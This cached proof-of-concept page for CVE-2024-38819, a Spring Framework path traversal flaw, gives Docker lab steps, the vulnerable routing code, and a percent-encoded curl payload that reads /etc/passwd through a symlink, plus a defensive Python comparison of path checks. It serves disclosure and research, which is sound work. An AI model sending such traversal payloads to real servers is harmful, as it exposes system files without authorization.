PoC details: fd38e2b5fb503c40e0c2f430b8dd7d7ebbc73ee2

Source
Related vulnerability
Title: VMware Spring Framework security vulnerability (CVE-2024-38819)
Description: VMware Spring Framework is an open-source Java and Java EE application framework from VMware (USA). The framework helps developers build high-quality applications. VMware Spring Framework contains a security vulnerability. An attacker exploiting this vulnerability can read files outside the service root path.
Introduction
# CVE-2024-38819: Proof of Concept (PoC)

This is a proof of concept for the [CVE-2024-38819](https://spring.io/security/cve-2024-38819) vulnerability, which I reported, demonstrating a path traversal exploit.

## Execution Steps
1. Build the Docker image (Spring Boot 3.3.4, based on Spring Framework 6.1.13)
   ```
   cd vuln
   docker build -t cve-2024-38819-poc .
   ```
2. Run the container and expose port 8080 to the host machine
   ```
   docker run -d -p 8080:8080 --name cve-2024-38819-poc cve-2024-38819-poc
   ```
3. Run the following command to execute the PoC and confirm the vulnerability
   ```
   curl http://localhost:8080/static/link/%2e%2e/etc/passwd
   ```

   If the attack is successful, the contents of the `/etc/passwd` file will be displayed.

## Explanation
1. Create `PathTraversalDemoApplication.java` with the following code to set up static file routing using `RouterFunction` and `FileSystemResource`:
    ```
    // Registers a functional route that serves files from /app/static/
    // for every request matching /static/**
    @Bean
    public RouterFunction<ServerResponse> staticResourceRouter() {
        return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/"));
    }
    ```

2. Add the following command to the Dockerfile to create a symbolic link:
    ```
    RUN ln -s /static /app/static/link
    ```

3. Create a payload that leverages percent-encoding to traverse directories through the symbolic link.
   - Path: `/static/link/%2e%2e/etc/passwd`

4. Use the following `curl` command to execute the PoC and verify whether the attack is successful:
    ```
    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    ```
   If the attack is successful, the contents of the `/etc/passwd` file will be displayed.
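
To make the symlink subtlety concrete from the defender's side, here is an added Python example (not Spring's code and not from this PoC repository) that compares a purely lexical containment check with one that resolves symlinks on the real filesystem; the directory layout, the `link` symlink and the `etc/passwd` content are all constructed inside a temp directory and mirror the PoC's `/app/static/link -> /static` layout.

```python
import os
import tempfile
from urllib.parse import unquote


def lexical_ok(root: str, rel_path: str) -> bool:
    """Containment check on the path string only: decode once, normalize,
    require the result to start with root. A symlink defeats this: the
    normalized string stays under root while the filesystem does not."""
    candidate = os.path.normpath(os.path.join(root, unquote(rel_path).lstrip("/")))
    return candidate == root or candidate.startswith(root + os.sep)


def resolved_ok(root: str, rel_path: str) -> bool:
    """Containment check on the real filesystem: fully percent-decode, resolve
    symlinks and '..' with realpath, require the result to stay under root.
    A symlink whose target lies outside root is therefore denied entirely."""
    decoded = rel_path
    while True:  # unwrap repeated encodings such as %252e -> %2e -> .
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "\x00" in decoded:
        return False
    real_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(real_root, decoded.lstrip("/")))
    return candidate == real_root or candidate.startswith(real_root + os.sep)


def build_sandbox() -> tuple:
    """Constructed layout under a temp dir (sample data, not the real file):
    <tmp>/app/static/link -> <tmp>/static, and <tmp>/etc/passwd."""
    tmp = tempfile.mkdtemp()
    root = os.path.join(tmp, "app", "static")
    os.makedirs(root)
    os.makedirs(os.path.join(tmp, "static"))
    os.makedirs(os.path.join(tmp, "etc"))
    with open(os.path.join(tmp, "etc", "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/sh\n")  # constructed sample line
    os.symlink(os.path.join(tmp, "static"), os.path.join(root, "link"))
    return tmp, root


if __name__ == "__main__":
    _, root = build_sandbox()
    req = "link/%2e%2e/etc/passwd"  # remainder of the PoC URL after /static/
    print("lexical check :", "allow" if lexical_ok(root, req) else "deny")
    print("resolved check:", "allow" if resolved_ok(root, req) else "deny")
```

The lexical check allows the PoC path because `link/../etc/passwd` normalizes to `<root>/etc/passwd`, while the resolved check follows `link` to its target first and sees that `..` leaves the root.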

## Disclaimer
This PoC is provided for educational and security research purposes. Before using this in a real system, ensure the vulnerability has been fixed and you have proper authorization. The author takes no responsibility for any misuse of this code.
File snapshot

```
[4.0K] /data/pocs/fd38e2b5fb503c40e0c2f430b8dd7d7ebbc73ee2
├── [1.0K] LICENSE
├── [1.9K] README.md
├── [4.0K] safe
│   ├── [ 477] build.gradle
│   ├── [ 550] Dockerfile
│   └── [4.0K] src
│       └── [4.0K] main
│           └── [4.0K] java
│               └── [4.0K] com
│                   └── [4.0K] example
│                       └── [ 975] PathTraversalDemoApplication.java
└── [4.0K] vuln
    ├── [ 477] build.gradle
    ├── [ 550] Dockerfile
    └── [4.0K] src
        └── [4.0K] main
            └── [4.0K] java
                └── [4.0K] com
                    └── [4.0K] example
                        └── [ 975] PathTraversalDemoApplication.java

12 directories, 8 files
```
The Shenlong bot has cached this for you.
Notes
    1. It is recommended to access the original source first.
    2. If the source is no longer available or cannot be accessed, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.